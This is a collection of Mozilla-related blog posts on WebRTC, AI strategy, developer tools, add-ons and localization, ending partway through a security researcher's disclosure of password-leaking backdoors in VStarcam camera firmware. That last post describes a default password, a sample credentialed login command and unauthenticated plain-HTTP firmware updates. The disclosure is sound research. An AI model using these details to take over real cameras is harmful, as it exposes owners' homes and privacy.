Advancing WebRTC: Firefox WebRTC 2025
In an increasingly siloed internet landscape, WebRTC directly connects human voices and faces. The technology powers Audio/Video calling, conferencing, live streaming, telehealth, and more. We strive to make Firefox the client that best serves humans during those experiences.
Expanding Simulcast SupportSimulcast allows a single WebRTC video to be simultaneously transmitted at differing qualities. Some codecs can efficiently encode the streams simultaneously. Each viewer can receive the video stream that gives them the best experience for their viewing situation, whether that be using a phone with a small screen and shaky cellular link, or a desktop with a large screen and wired broadband connection. While Firefox has supported a more limited set of simulcast scenarios for some time, this year we put a lot of effort into making sure that even more of our users using even more services can get those great experiences.
We have added simulcast capabilities for H.264 and AV1. This along with adding support for the dependency descriptor header (and H.264 support), increases the number of services that can take advantage of simulcast while using Firefox.
Codec SupportDovetailing the simulcast support, we now support more codecs doing more things on more platforms! This includes turning on AV1 support by default, and adding temporal layer support for H.264. Additionally there were a number of behind the scenes changes made. For our users, this means that they have a more uniform experience across devices.
Media CaptureWe have improved camera resolution and frame-rate adaptation on all platforms, as well as OS-integrated improved screen capture on macOS. Users will have a smoother experience when joining calls with streams that are better suited to their devices. This means having smoother video and a consistent aspect ratio.
DataChannelImproving reliability, performance, and compatibility of our DataChannel implementation has been a focus this year. DataChannels can now be run on workers keeping data processing off of the main thread. This was enabled by a major refactoring effort, migrating our implementation to dcsctp.
Web CompatibilityWe targeted a number of areas where we could improve compatibility with the broad web of services that our users rely on.
Bug 1329847 Implement RTCDegradationPreference related functions
Bug 1894137 Implement RTCRtpEncodingParameters.codec
Bug 1371391 Implement remaining mandatory fields in RTCIceCandidatePairStats
Bug 1525241 Implement RTCCertificate.getFingerprints method
Bug 1835077 Support RTCEncodedAudioFrameMetadata.contributingSources
Bug 1972657 SendKeyFrameRequest Should Not Reject Based on Transceiver State
Summary
2025 has been an exciting and busy year for WebRTC in Firefox. We have broadly improved web compatibility throughout the WebRTC technology stack, and we are looking forward to another impactful year in 2026.
The post Firefox WebRTC 2025 appeared first on Advancing WebRTC.
The Mozilla Blog: Mozilla welcomes Amy Keating as Chief Business Officer
Mozilla is pleased to announce that Amy Keating has joined Mozilla as Chief Business Officer (CBO).
In this role, Amy will work across the Mozilla family of organizations, and alongside other business leaders, including the Mozilla Corporation’s CBO Brad Smallwood — spanning products, companies, investments, grants, and new ventures — to help ensure we are not only advancing our mission but also financially sustainable and operationally rigorous. The core of this job: making investments that push the internet in a better direction.
Keating takes on this role at a pivotal moment for Mozilla and for the responsible technology ecosystem. As Mozilla pursues a new portfolio strategy centered on building an open, trustworthy alternative to today’s closed and concentrated AI ecosystem, the organization has embraced a double bottom line economic model: one that measures success through mission impact and commercial performance. Delivering on that model requires disciplined business leadership at the highest level.
“Mozilla’s mission has never been more urgent — but mission alone isn’t enough to bring about the change we want to see in the world,” said Mark Surman, President of the Mozilla Foundation. “To build real alternatives in AI and the web, we need to be commercially successful, sustainable, and able to invest at scale. Our double bottom line depends on it. Amy is a proven, visionary business leader who understands how to align values with viable, ambitious business strategy. She will help ensure Mozilla can grow, thrive, and influence the entire marketplace.”
This role is a return to Mozilla for Keating, who previously was Mozilla Corporation’s Chief Legal Officer. Keating has also served on the Boards of Mozilla Ventures and the Mozilla Foundation. Most recently, Keating held senior leadership roles at Glean and Planet Labs, and previously spent nearly a decade across Google and Twitter. She returns to Mozilla with 20 years of professional experience advising and operating in technology organizations. In these roles — and throughout her career — she has focused on building durable businesses grounded in openness, community, and long-term impact.
“Mozilla has always been creative, ambitious, and deeply rooted in community,” said Amy Keating. “I’m excited to return at a moment when the organization is bringing its mission and its assets together in new ways — and to help build the operational and business foundation that allows our teams and portfolio organizations to thrive.”
As Chief Business Officer, Amy brings an investment and growth lens to Mozilla, supporting Mozilla’s portfolio of mission-driven companies and nonprofits, identifying investments in new entities aligned with the organization’s strategy, and helping to strengthen Mozilla’s leadership creating an economic counterbalance to the players now dominating a closed AI ecosystem.
This work is critical not only to Mozilla’s own sustainability, but to its ability to influence markets and shape the future of AI and the web in the public interest.
“I’m here to move with speed and clarity,” said Keating, “and to think and act at the scale of our potential across the Mozilla Project.”
Read more here about Mozilla’s next era. Read here about Mozilla’s new CTO, Raffi Krikorian.
The post Mozilla welcomes Amy Keating as Chief Business Officer appeared first on The Mozilla Blog.
Eitan Isaacson: MacOS Accessibility with pyax

In our work on Firefox MacOS accessibility we routinely run into highly nuanced bugs in our accessibility platform API. The tree structure, an object attribute, the sequence of events, or the event payloads, is just off enough that we see a pronounced difference in how an AT like VoiceOver behaves. When we compare our API against other browsers like Safari or Chrome, we notice small differences that have out-sized user impacts.
In cases like that, we need to dive deep. XCode’s Accessibility Inspector shows a limited subset of the API, but web engines implement a much larger set of attributes that are not shown in the inspector. This includes an advanced, undocumented, text API. We also need a way to view and inspect events and their payloads so we can compare the sequence to other implementations.
Since we started getting serious about MacOS accessibility in Firefox in 2019 we have hobbled together an adhoc set of Swift and Python scripts to examine our work. It slowly started to coalesce and formalize into a python client library for MacOS accessibility called pyax.
Recently, I put some time into making pyax not just a Python library, but a nifty command line tool for quick and deep diagnostics. There are several sub commands I’ll introduce here. And I’ll leave the coolest for last, so hang on.
pyax treeThis very simply dumps the accessibility tree of the given application. But hold on, there are some useful flags you can use to drill down to the issue you are looking for:
--webOnly output the web view’s subtree. This is useful if you are troubleshooting a simple web page and don’t want to be troubled with the entire application.
--dom-idDump the subtree of the given DOM ID. This obviously is only relevant for web apps. It allows you to cut the noise and only look at the part of the page/app you care about.
--attributeBy default the tree dumper only shows you a handful of core attributes. Just enough to tell you a bit about the tree. You can include more obscure attributes by using this argument.
--all-attributesPrint all known attributes of each node.
--list-attributesList all available attributes on each node in the tree. Sometimes you don’t even know what you are looking for and this could help.
Implementation note: An app can provide an attribute without advertising its availability, so don’t rely on this alone.
--list-actionsList supported actions on each node.
--jsonOutput the tree in a JSON format. This is useful with --all-attributes to capture and store a comprehensive state of the tree for comparison with other implementations or other deep dives.
pyax observeThis is a simple event logger that allows you to output events and their payloads. It takes most of the arguments above, like --attribute, and --list-actions.
In addition:
--eventObserve specific events. You can provide this argument multiple times for more than one event.
--print-infoPrint the bundled event info.
pyax inspectFor visually inclined users, this command allows them to hover over the object of interest, click, and get a full report of its attributes, subtree, or any other useful information. It takes the same arguments as above, and more! Check out --help.
Getting pyaxDo pip install pyax[highlight] and its all yours. Please contribute with code, documentation, or good vibes (keep you vibes separate from the code).
Matthew Gaudet: Non-Traditional Profiling
Also known as “you can just put whatever you want in a jitdump you know?”
When you profile JIT code, you have to tell a profiler what on earth is going on in those JIT bytes you wrote out. Otherwise the profiler will shrug and just give you some addresses.
There’s a decent and fairly common format called jitdump, which originates in perf but has become used in more places. The basic thrust of the parts we care about is: you have names associated with ranges.
Of course, the basic range you’d expect to name is “function foo() was compiled to bytes 0x1000-0x1400“
Suppose you get that working. You might get a profile that looks like this one.
This profile is pretty useful: You can see from the flame chart what execution tier created the code being executed, you can see code from inline caches etc.
Before I left for Christmas break though, I had a thought: To a first approximation both -optimized- and baseline code generation is fairly ‘template’ style. That is to say, we emit (relatively) stable chunks of code for either one of our bytecodes, in the case of our baseline compiler, or for one of our intermediate-representation nodes in the case of Ion, our top tier compiler.
What if we looked more closely at that?
Some of our code is already tagged with AutoCreatedBy, and RAII class which pushes a creator string on, and pops it off when it’s not used. I went through and added AutoCreatedBy to each of the LIR op’s codegen methods (e.g. CodeGenerator::visit*). Then I rigged up our JITDump support so that instead of dumping functions, we dump the function name + whole chain of AutoCreatedBy as the ‘function name’ for that sequence of instructions generated while the AutoCreatedBy was live.
That gets us this profile
While it doesn’t look that different, the key is in how the frames are named. Of course, the vast majority of frames just are the name of the call instruction... that only makes sense. However, you can see some interesting things if you invert the call-tree
For example, we spend 1.9% of the profiled time doing for a single self-hosted function ‘visitHasShape’, which is basically:
masm.loadObjShapeUnsafe(obj, output); masm.cmpPtrSet(Assembler::Equal, output, ImmGCPtr(ins->mir()->shape()), output);Which is not particularly complicated.
Ok so that proves out the value. What if we just say... hmmm. I actually want to aggregate across all compilation; ignore the function name, just tell me the compilation path here.
Woah. Ok, now we’ve got something quite different, if really hard to interpret
Even more interesting (easier to interpret) is the inverted call tree:
So across the whole program, we’re spending basically 5% of the time doing guardShape. I think that’s a super interesting slicing of the data.
Is it actionable? I don’t know yet. I haven’t opened any bugs really on this yet; a lot of the highlighted code is stuff where it’s not clear that there is a faster way to do what’s being done, outside of engine architectural innovation.
The reason to write this blog post is basically to share that... man we can slice-and-dice our programs in so many interesting ways. I’m sure there’s more to think of. For example, not shown here was an experiment: I added AutoCreatedBy inside a single macro-assembler method set (around barriers) to try and see if I could actually see GC barrier cost (it’s low on the benchmarks I checked yo).
So yeah. You can just... put stuff in your JIT dump file.
Edited to Add: I should mention this code is nowhere. Given I don’t entirely know how actionable this ends up being, and the code quality is subpar, I haven’t even pushed this code. Think of this as an inspiration, not a feature announcement.
The Mozilla Blog: Owners, not renters: Mozilla’s open source AI strategy
The future of intelligence is being set right now, and the path we’re on leads somewhere I don’t want to go. We’re drifting toward a world where intelligence is something you rent — where your ability to reason, create, and decide flows through systems you don’t control, can’t inspect, and didn’t shape. In that world, the landlord can change the terms anytime, and you have no recourse but to accept what you’re given.
I think we can do better. Making that happen is now central to what Mozilla is doing.
What we did for the webTwenty-five years ago, Microsoft Internet Explorer controlled 95% of the browser market, which meant Microsoft controlled how most people experienced the internet and who could build what on what terms. Mozilla was born to change this, and Firefox succeeded beyond what most people thought possible — dropping Internet Explorer’s market share to 55% in just a few years and ushering in the Web 2.0 era. The result was a fundamentally different internet. It was faster and richer for everyday users, and for developers it was a launchpad for open standards and open source that decentralized control over the core technologies of the web.
There’s a reason the browser is called a “user agent.” It was designed to be on your side — blocking ads, protecting your privacy, giving you choices that the sites you visited never would have offered on their own. That was the first fight, and we held the line for the open web even as social networks and mobile platforms became walled gardens.
Now AI is becoming the new intermediary. It’s what I’ve started calling “Layer 8” — the agentic layer that mediates between you and everything else on the internet. These systems will negotiate on our behalf, filter our information, shape our recommendations, and increasingly determine how we interact with the entire digital world.
The question we have to ask is straightforward: Whose side will your new user agent be on?
Why closed systems are winning (for now)We need to be honest about the current state of play: Closed AI systems are winning today because they are genuinely easier to use. If you’re a developer with an idea you want to test, you can have a working prototype in minutes using a single API call to one of the major providers. GPUs, models, hosting, guardrails, monitoring, billing — it all comes bundled together in a package that just works. I understand the appeal firsthand, because I’ve made the same choice myself on late-night side projects when I just wanted the fastest path from an idea in my head to something I could actually play with.
The open-source AI ecosystem is a different story. It’s powerful and advancing rapidly, but it’s also deeply fragmented — models live in one repository, tooling in another, and the pieces you need for evaluation, orchestration, guardrails, memory, and data pipelines are scattered across dozens of independent projects with different assumptions and interfaces. Each component is improving at remarkable speed, but they rarely integrate smoothly out of the box, and assembling a production-ready stack requires expertise and time that most teams simply don’t have to spare. This is the core challenge we face, and it’s important to name it clearly: What we’re dealing with isn’t a values problem where developers are choosing convenience over principle. It’s a developer experience problem. And developer experience problems can be solved.
The ground is already shiftingWe’ve watched this dynamic play out before and the history is instructive. In the early days of the personal computer, open systems were rough, inconsistent, and difficult to use, while closed platforms offered polish and simplicity that made them look inevitable. Openness won anyway — not because users cared about principles, but because open systems unlocked experimentation and scale that closed alternatives couldn’t match. The same pattern repeated on the web, where closed portals like AOL and CompuServe dominated the early landscape before open standards outpaced them through sheer flexibility and the compounding benefits of broad participation.
AI has the potential to follow the same path — but only if someone builds it. And several shifts are already reshaping the landscape:
- Small models have gotten remarkably good. 1 to 8 billion parameters, tuned for specific tasks — and they run on hardware that organizations already own;
- The economics are changing too. As enterprises feel the constraints of closed dependencies, self-hosting is starting to look like sound business rather than ideological commitment (companies like Pinterest have attributed millions of dollars in savings to migrating to open-source AI infrastructure);
- Governments want control over their supply chain. Governments are becoming increasingly unwilling to depend on foreign platforms for capabilities they consider strategically important, driving demand for sovereign systems; and,
- Consumer expectations keep rising. People want AI that responds instantly, understands their context, and works across their tools without locking them into a single platform.
The capability gap that once justified the dominance of closed systems is closing fast. What remains is a gap in usability and integration. The lesson I take from history is that openness doesn’t win by being more principled than the alternatives. Openness wins when it becomes the better deal — cheaper, more capable, and just as easy to use
Where the cracks are formingIf openness is going to win, it won’t happen everywhere at once. It will happen at specific tipping points — places where the defaults haven’t yet hardened, where a well-timed push can change what becomes normal. We see four.
The first is developer experience. Developers are the ones who actually build the future — every default they set, every stack they choose, every dependency they adopt shapes what becomes normal for everyone else. Right now, the fastest path runs through closed APIs, and that’s where most of the building is happening. But developers don’t want to be locked in any more than users do. Give them open tools that work as well as the closed ones, and they’ll build the open ecosystem themselves.
The second is data. For a decade, the assumption has been that data is free to scrape — that the web is a commons to be harvested without asking. That norm is breaking, and not a moment too soon. The people and communities who create valuable data deserve a say in how it’s used and a share in the value it creates. We’re moving toward a world of licensed, provenance-based, permissioned data. The infrastructure for that transition is still being built, which means there’s still a chance to build it right.
The third is models. The dominant architecture today favors only the biggest labs, because only they can afford to train massive dense transformers. But the edges are accelerating: small models, mixtures of experts, domain-specific models, multilingual models. As these approaches mature, the ability to create and customize intelligence spreads to communities, companies, and countries that were previously locked out.
The fourth is compute. This remains the choke point. Access to specialized hardware still determines who can train and deploy at scale. More doors need to open — through distributed compute, federated approaches, sovereign clouds, idle GPUs finding productive use.
What an open stack could look likeToday’s dominant AI platforms are building vertically integrated stacks: closed applications on top of closed models trained on closed data, running on closed compute. Each layer reinforces the next — data improves models, models improve applications, applications generate more data that only the platform can use. It’s a powerful flywheel. If it continues unchallenged, we arrive at an AI era equivalent to AOL, except far more centralized. You don’t build on the platform; you build inside it.
There’s another path. The sum of Linux, Apache, MySQL, and PHP won because that combination became easier to use than the proprietary alternatives, and because they let developers build things that no commercial platform would have prioritized. The web we have today exists because that stack existed.
We think AI can follow the same pattern. Not one stack controlled by any single party, but many stacks shaped by the communities, countries, and companies that use them:
- Open developer interfaces at the top. SDKs, guardrails, workflows, and orchestration that don’t lock you into a single vendor;
- Open data standards underneath. Provenance, consent, and portability built in by default, so you know where your training data came from and who has rights to it;
- An open model ecosystem below that. Smaller, specialized, interchangeable models that you can inspect, tune to your values, and run where you need them; and
- Open compute infrastructure at the foundation. Distributed and federated hardware across cloud and edge, not routed through a handful of hyperscn/lallers.
Pieces of this stack already exist — good ones, built by talented people. The task now is to fill in the gaps, connect what’s there, and make the whole thing as easy to use as the closed alternatives. That’s the work.
Why open source matters hereIf you’ve followed Mozilla, you know the Manifesto. For almost 20 years, it’s guided what we build and how — not as an abstract ideal, but as a tool for making principled decisions every single day. Three of its principles are especially urgent in the age of AI:
- Human agency. In a world of AI agents, it’s more important than ever that technology lets people shape their own experiences — and protects privacy where it matters most;
- Decentralization and open source. An open, accessible internet depends on innovation and broad participation in how technology gets created and used. The success of open-source AI, built around transparent community practices, is critical to making this possible; and
- Balancing commercial and public benefit. The direction of AI is being set by commercial players. We need strong public-benefit players to create balance in the overall ecosystem.
Open-source AI is how these principles become real. It’s what makes plurality possible — many intelligences shaped by many communities, not one model to rule them all. It’s what makes sovereignty possible — owning your infrastructure rather than renting it. And it’s what keeps the door open for public-benefit alternatives to exist alongside commercial ones.
What we’ll do in 2026The window to shape these defaults is still open, but it won’t stay open forever. Here’s where we’re putting our effort — not because we have all the answers, but because we think these are the places where openness can still reset the defaults before they harden.
Make open AI easier than closed. Mozilla.ai is building any-suite, a modular framework that integrates the scattered components of the open AI stack — model routing, evaluation, guardrails, memory, orchestration — into something coherent that developers can actually adopt without becoming infrastructure specialists. The goal is concrete: Getting started with open AI should feel as simple as making a single API call.
Shift the economics of data. The Mozilla Data Collective is building a marketplace for data that is properly licensed, clearly sourced, and aligned with the values of the communities it comes from. It gives developers access to high-quality training data while ensuring that the people and institutions who contribute that data have real agency and share in the economic value it creates.
Learn from real deployments. Strategy that isn’t grounded in practical experience is just speculation, so we’re deepening our engagement with governments and enterprises adopting sovereign, auditable AI systems. These engagements are the feedback loops that tell us where the stack breaks and where openness needs reinforcement.
Invest in the ecosystem. We’re not just building; we’re backing others who are building too. Mozilla Ventures is investing in open-source AI companies that align with these principles. Mozilla Foundation is funding researchers and projects through targeted grants. We can’t do everything ourselves, and we shouldn’t try. The goal is to put resources behind the people and teams already doing the work.
Show up for the community. The open-source AI ecosystem is vast, and it’s hard to know what’s working, what’s hype, and where the real momentum is building. We want to be useful here. We’re launching a newsletter to track what’s actually happening in open AI. We’re running meetups and hackathons to bring builders together. We’re fielding developer surveys to understand what people actually need. And at MozFest this year, we’re adding a dedicated developer track focused on open-source AI. If you’re doing important work in this space, we want to help it find the people who need to see it.
Are you in?Mozilla is one piece of a much larger movement, and we have no interest in trying to own or control it — we just want to help it succeed. There’s a growing community of people who believe the open internet is still worth defending and who are working to ensure that AI develops along a different path than the one the largest platforms have laid out. Not everyone in that community uses the same language or builds exactly the same things, but something like a shared purpose is emerging. Mozilla sees itself as part of that effort.
We kept the web open not by asking anyone’s permission, but by building something that worked better than the alternatives. We’re ready to do that again.
So: Are you in?
If you’re a developer building toward an open source AI future, we want to work with you. If you’re a researcher, investor, policymaker, or founder aligned with these goals, let’s talk. If you’re at a company that wants to build with us rather than against us, the door is open. Open alternatives have to exist — that keeps everyone honest.
The future of intelligence is being set now. The question is whether you’ll own it, or rent it.
We’re launching a newsletter to track what’s happening in open-source AI — what’s working, what’s hype, and where the real momentum is building. Sign up here to follow along as we build.
Read more here about our emerging strategy, and how we’re rewiring Mozilla for the era of AI.
The post Owners, not renters: Mozilla’s open source AI strategy appeared first on The Mozilla Blog.
Firefox Add-on Reviews: 2025 Staff Pick Add-ons
While nearly half of all Firefox users have installed an add-on, it’s safe to say nearly all Firefox staffers use add-ons. I polled a few of my peers and here are some of our staff favorite add-ons of 2025…
Falling Snow Animated ThemeEnjoy the soothing mood of Falling Snow Animated Theme. This motion-animated dark theme turns Firefox into a calm wintry night as snowflakes cascade around the corners of your browser.
Privacy BadgerThe flagship anti-tracking extension from privacy proponents at the Electronic Frontier Foundation, Privacy Badger is built to look for a certain set of actions that indicate a web page is trying to secretly track you.
Zero set up required. Just install Privacy Badger and it will automatically search for third-party cookies, HTML5 local storage “supercookies,” canvas fingerprinting, and other sneaky tracking methods.
Adaptive Tab Bar ColorTurn Firefox into an internet chameleon. Adaptive Tab Bar Color changes the colors of Firefox to match whatever website you’re visiting.
It’s beautifully simple and sublime. No setup required, but you’re free to make subtle adjustments to color contrast patterns and assign specific colors for websites.
Rainy Spring Sakura by MaDonnaCreated by one of the most prolific theme designers in the Firefox community, MaDonna, we love Rainy Spring Sakura’s bucolic mix of calming colors.
It’s like instant Zen mode for Firefox.
Return YouTube DislikeDo you like the Dislike? YouTube removed the thumbs-down display, but fortunately Return YouTube Dislike came along to restore our view into the sometimes brutal truth of audience sentiment.
Other Firefox users seem to agree…
“Does exactly what the name suggests. Can’t see myself without this extension. Seriously, bad move on YouTube for removing such a vital tool.”
Firefox user OFG
“i have never smashed 5 stars faster.”
Firefox user 12918016
Return YouTube Dislike re-enables a beloved feature.
LeechBlock NG
Block time-wasting websites with LeechBlock NG — easily one of our staff-favorite productivity tools.
Lots of customization features help you stay focused and free from websites that have a way of dragging you down. Key features:
- Block entire websites or just portions (e.g. allow YouTube video pages but block the homepage)
- Block websites based on time of day, day of the week, or both
- Time limit customization (e.g. only 1 hour of Reddit per day)
Drift through serene outer space as you browse the web. DarkSpaceBlue celebrates the infinite wonder of life among the stars.
LanguageTool – Grammar and Spell CheckerImprove your prose anywhere you write on the web. LanguageTool – Grammar and Spell Checker will make you a better writer in 25+ languages.
Much more than a basic spell checker, this privacy-centric writing aid is packed with great features:
- Offers alternate phrasing for brevity and clarity
- Recognizes common misuses of similar sounding words (e.g. there/their, your/you’re)
- Works with all web-based email and social media
- Provides synonyms for overused words
LanguageTool can help with subtle syntax improvements.
Sink It for Reddit!
Imagine a more focused and free feeling Reddit — that’s Sink It for Reddit!
Some of our staff-favorite features include:
- Custom content muting (e.g. ad blocking, remove app install and login prompts)
- Color-coded comments
- Streamlined navigation
- Adaptive dark mode
Turns out we have quite a few sushi fans at Firefox. We celebrate our love of sushi with the savory theme Sushi Nori.
Mozilla Localization (L10N): Mozilla Localization in 2025
As is tradition, we’re wrapping up 2025 for Mozilla’s localization efforts and offering a sneak peek at what’s in store for 2026 (you can find last year’s blog post here).
Pontoon’s metrics in 2025 show a stable picture for both new sign-ups and monthly active users. While we always hope to see signs of strong growth, this flat trend is a positive achievement when viewed against the challenges surrounding community involvement in Open Source, even beyond Mozilla. Thank you to everyone actively participating on Pontoon, Matrix, and elsewhere for making Mozilla localization such an open and welcoming community.
- 30 projects and 469 locales (+100 compared to 2024) set up in Pontoon.
- 5,019 new user registrations
- 1,190 active users, submitting at least one translation, on average 233 users per month (+5% Year-over-Year)
- 551,378 submitted translations (+18% YoY)
- 472,195 approved translations (+22% YoY)
- 13,002 new strings to translate (-38% YoY).
The number of strings added has decreased significantly overall, but not for Firefox, where the number of new strings was 60% higher than in 2024 (check out the increase of Fluent strings alone). That is not surprising, given the amount of new features (selectable profiles, unified trust panel, backup) and the upcoming settings redesign.
As in 2024, the relentless growth in the number of locales is driven by Common Voice, which now has 422 locales enabled in Pontoon (+33%).
Before we move forward, thank you to all the volunteers who contributed their time, passion, and expertise to Mozilla’s localization over the last 12 months — or plan to do so in 2026. There is always space for new contributors!
Pontoon DevelopmentA significant part of the work on Pontoon in 2025 isn’t immediately visible to users, but it lays the groundwork for improvements that will start showing up in 2026.
One of the biggest efforts was switching to a new data model to represent all strings across all supported formats. Pontoon currently needs to handle around ten different formats, as transparently as possible for localizers, and this change is a step to reduce complexity and technical debt. As a concrete outcome, we can now support proper pluralization in Android projects, and we landed the first string using this model in Firefox 146. This removes long-standing UX limitations (no more Bookmarks saved: %1$s instead of %1$s bookmarks saved) and allows languages to provide more natural-sounding translations.
In parallel, we continued investing in a unified localization library, moz-l10n, with the goal of having a centralized, well-maintained place to handle parsing and serialization across formats in both JavaScript and Python. This work is essential to keep Pontoon maintainable as we add support for new technologies and workflows.
Pontoon as a project remains very active. In 2025 alone, Pontoon saw more than 200 commits from over 20 contributors, not including work happening in external libraries such as moz-l10n.
Finally, we’ve been improving API support, another area that is largely invisible to end users. We moved away from GraphQL and migrated to Django REST, and we’re actively working toward feature parity with Transvision to better support automation and integrations.
CommunityOur main achievement in 2025 was organizing a pilot in-person event in Berlin, reconnecting localizers from around Europe after a long hiatus. Fourteen volunteers from 11 locales spent a weekend together at the Mozilla Berlin office, sharing ideas, discussing challenges, and deepening relationships that had previously existed only online. For many attendees, this was the first time they met fellow contributors they had collaborated with for years, and the energy and motivation that came out of those days clearly showed the value of human connection in sustaining our global community.
This doesn’t mean we stopped exploring other ways to connect. For example, throughout the year we continued publishing Contributor Spotlights, showcasing the amazing work of individual volunteers from different parts of the world. These stories highlight not just what our contributors do, but who they are and why they make Mozilla’s localization work possible.
Internally, these spotlights have played an important role for advocating on behalf of the community. By bringing real voices and contributions to the forefront, we’ve helped reinforce the message that investing in people — not just tools — is essential to the long-term health of Mozilla’s localization ecosystem.
What’s coming in 2026As we move into the new year, our focus will shift to exploring alternative deployment solutions. Our goal is to make Pontoon faster, more reliable, and better equipped to meet the needs of our users.
This excerpt comes from last year’s blog post, and while it took longer than expected, the good news is that we’re finally there. On January 6, we moved Pontoon to a new hosting platform. We expect this change to bring better reliability and performance, especially in response to peaks in bot traffic that have previously made Pontoon slow or unresponsive.
In parallel, we “silently” launched the Mozilla Language Portal, a unified hub that reflects Mozilla’s unique approach to localization while serving as a central resource for the global translator community. While we still plan to expand its content, the main infrastructure is now in place and publicly available, bringing together searchable translation memories, documentation, blog posts, and other resources to support knowledge-sharing and collaboration.
On the technology side, we plan to extend plural support to iOS projects and continue improving Pontoon’s translation memory support. These improvements aim to make it easier to reuse translations across projects and formats, for example by matching strings independently of placeholder syntax differences, and to translate Fluent strings with multiple values.
We also aim to explore improvements in our machine translation options, evaluating how large language models could help with quality assessment or serve as alternative providers for MT suggestions.
Last but not least, we plan to keep investing in our community. While we don’t know yet what that will look like in practice, keep an eye on this blog for updates.
If you have any thoughts or ideas about this plan, let us know on Mastodon or Matrix!
Thank you!As we look toward 2026, we’re grateful for the people who make Mozilla’s localization possible. Through shared effort and collaboration, we’ll continue breaking down barriers and building a web that works for everyone. Thank you for being part of this journey.
Wladimir Palant: Backdoors in VStarcam cameras
VStarcam is an important brand of cameras based on the PPPP protocol. Unlike the LookCam cameras I looked into earlier, these are often being positioned as security cameras. And they in fact do a few things better like… well, like having a mostly working authentication mechanism. In order to access the camera one has to know its administrator password.
So much for the theory. When I looked into the firmware of the cameras I discovered a surprising development: over the past years this protection has been systematically undermined. Various mechanisms have been added that leak the access password, and in several cases these cannot be explained as accidents. The overall tendency is clear: for some reason VStarcam really wants to have access to their customer’s passwords.
A reminder: “P2P” functionality based on the PPPP protocol means that these cameras will always communicate with and be accessible from the internet, even when located on a home network behind NAT. Short of installing a custom firmware this can only addressed by configuring the network firewall to deny internet access.
Contents- How to recognize affected cameras
- Downloading the firmware
- Caveats of this survey
- VStarcam’s authentication approach
- Endpoint protection
- Unauthenticated log access
- Explicit password leaking via logs
- Log uploading
- Password-leaking backdoor
- Establishing a timeline
- The impact
- Coordinated disclosure attempt
- Recommendations
Not every VStarcam camera has “VStarcam” printed on the side. I have seen reports of VStarcam cameras being sold under the brand names Besder, MVPower, AOMG, OUSKI, and there are probably more.
Most cameras should be recognizable by the app used to manage them. Any camera managed by one of these apps should be a VStarcam camera: Eye4, EyeCloud, FEC Smart Home, HOTKam, O-KAM Pro, PnPCam, VeePai, VeeRecon, Veesky, VKAM, VsCam, VStarcam Ultra.
Downloading the firmwareVStarcam cameras have a mechanism to deliver firmware updates (LookCam cameras prove that this shouldn’t be taken for granted). The app managing the camera will request update information from an address like http://api4.eye4.cn:808/firmware/1.2.3.4/EN where 1.2.3.4 is the firmware version. If a firmware update is available the response will contain a download server and a download path. The app sends these to the device which then downloads and installs the updated firmware.
Both requests are performed over plain HTTP and this is already the first issue. If an attacker can produce a manipulated response either on the network that the app or the device are connected to they will be able to install a malicious update on the camera. The former is particularly problematic, as the camera owner may connect to an open WiFi or similarly untrusted networks while being out.
The last part of a firmware version is a build number which is ignored for the update requests. The first part is a vendor ID where only a few options seem relevant (I checked 10, 48 and 66). The rest of the version number can be easily enumerated. Many firmware branches don’t have an active update, and when they do some updates won’t download because the servers in question appear no longer operational. Still, I found 380 updates this way.
I managed to unpack all but one of these updates. Firmware version 10.1.110.2 wasn’t for a camera but rather some device with an HDMI connector and without any P2P functionality – probably a Network Video Recorder (NVR). Firmware version 10.121.160.42 wasn’t using PPPP but something called NHEP2P and an entirely different application-level protocol. Ten updates weren’t updating the camera application but only the base system. This left 367 firmware versions for this investigation.
Caveats of this surveyI do not own any VStarcam hardware, nor would it be feasible to investigate hundreds of different firmware versions with real hardware. The results of this article are based solely on reverse engineering, emulation, and automated analysis via running Ghidra in headless mode. While I can easily emulate a PPPP server, doing the same for the VStarcam cloud infrastructure isn’t possible, I simply don’t know how it behaves. Similarly, the firmware’s interaction with hardware had to be left out of the emulation. While I’m still quite confident in my results, these limitations could introduce errors.
More importantly, there are only so many firmware versions that I checked manually. Most of them were checked automatically, and I typically only looked at a few lines of decompiled code that my scripts extracted. There is potential for false negatives here, I expect that there are more issues with VStarcam firmware than what’s listed here.
VStarcam’s authentication approachWhen an app communicates with a camera, it sends commands like GET /check_user.cgi?loginuse=admin&loginpas=888888&user=admin&pwd=888888. Despite the looks of it, these aren’t HTTP requests passed on to a web server. Instead, the firmware handles these in function P2pCgiParamFunction which doesn’t even attempt to parse the request. The processing code looks for substrings like check_user.cgi to identify the command (yes, you better don’t set check_user.cgi as your access password). Parameter extraction works via similar substring matching.
It’s worth noting that these cameras have a very peculiar authentication system which VStarcam calls “dual authentication.” Here is how the Eye4 application describes it:
The dual authentication mechanism is a measure to upgrade the whole system security
- The device will double check the identity of the visitor and does not support the old version of app.
- Considering the security risk of possible leakage, the plaintext password mode of the device was turned off and ciphertext access was used.
- After the device is added for the first time, it will not be allowed to be added for a second time, and it will be shared by the person who has added it.
I’m not saying that this description is utter bullshit but there is a considerable mismatch with the reality that I can observe. The VStarcam firmware cannot accept anything other than plaintext passwords. Newer firmware versions employ obfuscation on the PPPP-level but this hardly deserves the name “ciphertext”.
What I can see is: once a device is enrolled into dual authentication, the authentication is handled by function GetUserPri_doubleVerify rather than GetUserPri. There isn’t a big difference between the two, both will try the credentials from the loginuse/loginpas parameters and fall back to the user/pwd credentials pair. Function GetUserPri_doubleVerify merely checks a different password.
From the applications I get the impression that the dual authentication password is automatically generated and probably not even shared with the user but stored in their cloud account. This is an improvement over the regular password that defaults to 888888 and allowed these cameras to be enrolled into a botnet. But it’s still a plaintext password used for authentication.
There is a second aspect to dual authentication. When dual authentication is used, the app is supposed to make a second authentication call to eye4_authentication.cgi. The loginAccount and loginToken parameters here appear to belong to the user’s cloud account, apparently meant to make sure that only the right user can access a device.
Yet in many firmware versions I’ve seen the eye4_authentication.cgi request always succeeds. The function meant to perform a web request is simply hardcoded to return the success code 200. Other firmware versions actually make a request to https://verification.eye4.cn, yet this server also seems to produce a 200 response regardless of what parameters I try. It seems that VStarcam never made this feature work the way they intended it.
None of this stopped VStarcam from boasting on their website merely a year ago:
You can certainly count on anything saying “financial grade encryption” being bullshit. I have no idea where AES comes into the picture here, I haven’t seen it being used anywhere. Maybe it’s their way of saying “we use TLS when connecting to our cloud infrastructure.”
Endpoint protectionA reasonable approach to authentication is: authentication is required before any requests unrelated to authentication can be made. This is not the approach taken by VStarcam firmware. Instead, some firmware versions decide for each endpoint individually whether authentication is necessary. Other versions put a bunch of endpoints outside of the code enforcing authentication.
